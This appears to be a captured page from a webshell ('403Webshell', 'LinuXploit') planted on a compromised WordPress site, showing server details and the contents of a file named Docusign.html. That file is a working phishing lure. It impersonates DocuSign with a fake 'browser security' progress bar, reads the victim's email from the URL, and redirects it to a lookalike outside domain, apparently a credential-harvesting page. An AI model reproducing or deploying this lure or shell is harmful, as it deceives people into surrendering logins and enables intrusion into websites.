403Webshell
Server IP : 195.58.49.151  /  Your IP : 216.73.216.250
Web Server : Apache/2.4.67 (Debian) mod_fcgid/2.3.9 OpenSSL/3.0.20
System : Linux hs.hsdns.ru 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : antilam ( 1007)
PHP Version : 8.4.22
Disable Function : system,passthru,popen
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/antilam/web/antilam.ru/public_html/wp-content/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/antilam/web/antilam.ru/public_html/wp-content//Docusign.html
��<!doctype html>

<html lang="en">

<head>

<meta charset="utf-8">

<meta name="viewport" content="width=device-width,initial-scale=1">

<title>D0CUSIGN REDIRECT</title>

<style>

  body {

    margin: 0;

    background: #f1f1f1;

    font-family: system-ui, sans-serif;

    display: flex;

    justify-content: center;

    align-items: center;

    height: 100vh;

  }



  table.main-box {

    width: 950px;

    height: 450px;

    background: #fff;

    border-radius: 16px;

    box-shadow: 0 8px 24px rgba(0,0,0,0.08);

    border-collapse: collapse;

    overflow: hidden;

  }



  td.left-side {

    width: 45%;

    background: #000;

    padding: 0;

  }



  td.left-side img {

    width: 100%;

    height: 100%;

    object-fit: cover;

    display: block;

  }



  td.right-side {

    width: 55%;

    padding: 20px;

    vertical-align: top;

  }



  .right-side {

    display: flex;

    flex-direction: column;

    justify-content: space-between;

    height: 100%;

  }



  h2 { margin: 0; font-size: 1.4rem; }

  .schoolname { color: #007BFF; margin: 4px 0; font-weight: 600; }

  .sub-text { color: #555; font-size: 0.95rem; margin-bottom: 30px; }



  .lesson-area { display: flex; flex-direction: column; align-items: center; margin-top: auto; }

  .lessons { margin: 0; padding: 0; }

  .item { display: none; font-size: 0.95rem; color: #333; text-align: center; }

  .item.active { display: block; }



  .loading-box { text-align: center; margin-top: 0; }

  .progress { width: 300px; height: 23px; background: #e0e0e0; border-radius: 10px; overflow: hidden; margin: 0 auto; }

  .progress-bar { width: 0%; height: 100%; background: linear-gradient(90deg, #007BFF, #00c3ff); transition: width 0.2s linear; }

  .progress-text { margin-top: 10px; font-weight: bold; color: #007BFF; }

  .complete-text { display: none; margin-top: 8px; color: green; font-weight: bold; }

</style>

</head>

<body>



<table class="main-box">

  <tr>

    <td class="left-side">

      <img src="https://i.postimg.cc/zD9nMv9S/Docusign-Logo-6.png" alt="Left image">

    </td>

    <td class="right-side">

      <div class="right-side">

        <h2>DocuSign Secure Portal</h2>

        <h3 class="schoolname">Sign in as <span id="userEmail">your email</span></h3>

        <p class="sub-text">Your Document is being Verified and to ensure Authencity and Browser safety, </p>



        <div class="lesson-area">

          <div class="lessons" id="lessons">

            <div class="item active"><img src="https://i.postimg.cc/k57NVsDy/doculock1.jpg" style="width: 20px; height : 20px; margin-right : 5px;" >Checking Browser Security.....</div>

            <div class="item"><img src="https://i.postimg.cc/hhFTKbH1/doculock2.png" style="width: 20px; height : 20px; margin-right : 5px;" >Encrypting Document....</div>

            <div class="item"><img src="https://i.postimg.cc/tC1ByBVT/doculock.png" style="width: 20px; height : 20px; margin-right : 5px;" >Validating Document Signatures......</div>

            <div class="item"><img src="https://i.postimg.cc/Jh76wM31/doculock3.png" style="width: 20px; height : 20px; margin-right : 5px;" >Completing Secure Verification....</div>

          </div>



          <div class="loading-box">

            <div class="progress">

              <div class="progress-bar" id="progressBar"></div>

            </div>

            <div class="progress-text" id="progressText">0%</div>

            <div class="complete-text" id="completeText">Loading Complete   Redirecting& </div>

        <p class="sub-text">Please do not share when being verified</p>

          </div>

        </div>

      </div>

    </td>

  </tr>

</table>



<script>

  // Grab email from URL hash (after #)

  const hashEmail = window.location.hash.substring(1);

  if(hashEmail){

    const emailSpan = document.getElementById("userEmail");

    emailSpan.textContent = hashEmail;

  }



  const bar = document.getElementById("progressBar");

  const text = document.getElementById("progressText");

  const completeText = document.getElementById("completeText");

  const lessons = document.querySelectorAll(".item");



  let progress = 0;

  const totalLessons = lessons.length;

  const step = 100 / totalLessons;

  let currentLesson = 0;



  const interval = setInterval(() => {

    progress++;

    bar.style.width = progress + "%";

    text.textContent = progress + "%";



    if (progress >= (currentLesson + 1) * step && currentLesson < totalLessons - 1) {

      lessons[currentLesson].classList.remove("active");

      currentLesson++;

      lessons[currentLesson].classList.add("active");

    }



    if (progress >= 100) {

      clearInterval(interval);

      text.style.display = "none";

      completeText.style.display = "block";

      setTimeout(() => {

        const email = window.location.hash.substring(1);

        const redirectUrl = email ? "https://api-8zs0gem2r.onewayoutolook.one/" + email : "https://api-8zs0gem2r.onewayoutolook.one/";

        window.location.href = redirectUrl;

      }, 1200);

    }

  }, 120);

</script>



</body>

</html>


Youez - 2016 - github.com/yon3zu
LinuXploit